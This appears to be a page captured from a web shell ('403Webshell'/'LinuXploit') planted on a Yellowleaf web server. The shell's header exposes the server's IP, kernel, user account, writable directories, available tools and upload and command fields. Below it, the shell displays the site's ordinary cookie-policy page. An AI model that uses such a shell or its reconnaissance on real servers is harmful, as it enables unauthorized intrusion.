403Webshell
Server IP : 51.89.169.208  /  Your IP : 216.73.216.57
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/yellowleaf/public_html/cookie_policy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yellowleaf/public_html/cookie_policy/index.html
<!DOCTYPE html>
<html lang="en">
   <head>
	  <title>Yellowleaf - Cookie Policy</title>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link rel="stylesheet" href="/header-footer/global.css">
      <link rel="stylesheet" href="cookie_policy.css">
	  
      <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
</head>
<?php
   $path  = $_SERVER['DOCUMENT_ROOT'];
   include_once $path.'/header-footer/header.html';
?>

    <!-- start: About -->
    <section>
        <div class="container">
            <div class="about-wrapper">
                <div class="about-side">
                    <div class="about-side-menu">
                        <div class="about-side-menu-header">Info Menu</div>
                        <a href="/about/" class="about-side-menu-link ">About Us</a>
                        <a href="/support/" class="about-side-menu-link">Contact Us</a>
                        <a href="/terms/" class="about-side-menu-link">Terms & Conditions</a>
                        <a href="/privacy/" class="about-side-menu-link">Privacy Policy</a>
                        <a href="/cookie_policy/" class="about-side-menu-link active">Cookie Policy</a>
                    </div>
                </div>
                <div class="about-main">
                    <div class="about-main-title">Cookie Policy</div>
                    <div class="about-main-wrapper">
                        <p class="about-main-subtitle">Cookies at Yellowleaf</p>
                        <p>At Yellowleaf cookies are used to maximise usability of our website and to ensure that the user has a safe and seamless experience. To restrict on your web browser, then this can be done by accessing the browser settings. For further information on cookies, please visit: <a target="_blank" href="http://www.aboutcookies.org.uk/">http://www.aboutcookies.org.uk/</a>. Listed below are cookies which are considered necessary for our website in order for that browser securely and seamlessly. Without these cookies or sessions enabled, the website may not function up to standard expectations.</p>
                        <p class="about-main-subtitle">Necessary Cookies</p>
                        <div class="cookie-accordion">
                            <div class="cookie-accordion-toggle"><span class="cookie-accordion-toggle-text">Show </span> Necessary Cookies <span class="cookie-accordion-toggle-icon">+</span></div>
                            <div class="cookie-accordion-body">
                                <div class="table-responsive">
                                    <table>
                                        <thead>
                                            <tr>
                                                <th>Cookie</th>
                                                <th>Purpose</th>
                                                <th>Persistent or Session</th>
                                            </tr>
                                        </thead>
                                        <tbody>
                                            <tr>
                                                <td>ename</td>
                                                <td>Manages Yellowleaf member accessibility.</td>
                                                <td>Session</td>
                                            </tr>
                                            <tr>
                                                <td>epass</td>
                                                <td>Manages Yellowleaf member accessibility.</td>
                                                <td>Session</td>
                                            </tr>
                                            <tr>
                                                <td>eremember</td>
                                                <td>Manages Yellowleaf member accessibility.</td>
                                                <td>Session</td>
                                            </tr>
                                            <tr>
                                                <td>yl_user</td>
                                                <td>For system to remember to keep member logged in.</td>
                                                <td>Persistent - 100 days expiration</td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </div>
                            </div>
                        </div>
                        <p class="about-main-subtitle">Performance and advertising cookies</p>
                        <div class="cookie-accordion">
                            <div class="cookie-accordion-toggle"><span class="cookie-accordion-toggle-text">Show </span> Performance Cookies <span class="cookie-accordion-toggle-icon">+</span></div>
                            <div class="cookie-accordion-body">
                                <div class="table-responsive">
                                    <table>
                                        <thead>
                                            <tr>
                                                <th>Cookie</th>
                                                <th>Purpose</th>
                                            </tr>
                                        </thead>
                                        <tbody>
                                            <tr>
                                                <td>Google Analytics</td>
                                                <td>Monitoring user performance and recording website statistics.</td>
                                            </tr>
                                            <tr>
                                                <td>Google Ads</td>
                                                <td>Monitoring pay per click advertising on the website</td>
                                            </tr>
                                            <tr>
                                                <td>Google</td>
                                                <td>Showing advertisements around Yellowleaf. See <a target="_blank" href="http://www.google.com/policies/technologies/ads/">Google Advertising.</a></td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
<?php
   include_once $path.'/header-footer/footer.html';
?>
<script>
    var cookieAccordions = document.querySelectorAll('.cookie-accordion')

    cookieAccordions.forEach(function(item) {
        var toggle = item.querySelector('.cookie-accordion-toggle')
        var body = item.querySelector('.cookie-accordion-body')

        toggle.addEventListener('click', function() {
            body.classList.toggle('active')
            this.classList.toggle('active')

            var text = this.querySelector('.cookie-accordion-toggle-text')
            var icon = this.querySelector('.cookie-accordion-toggle-icon')

            if(this.classList.contains('active')) {
                text.textContent = 'Hide'
                icon.textContent = '-'
            } else {
                text.textContent = 'Show'
                icon.textContent = '+'
            }
        })
    })
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit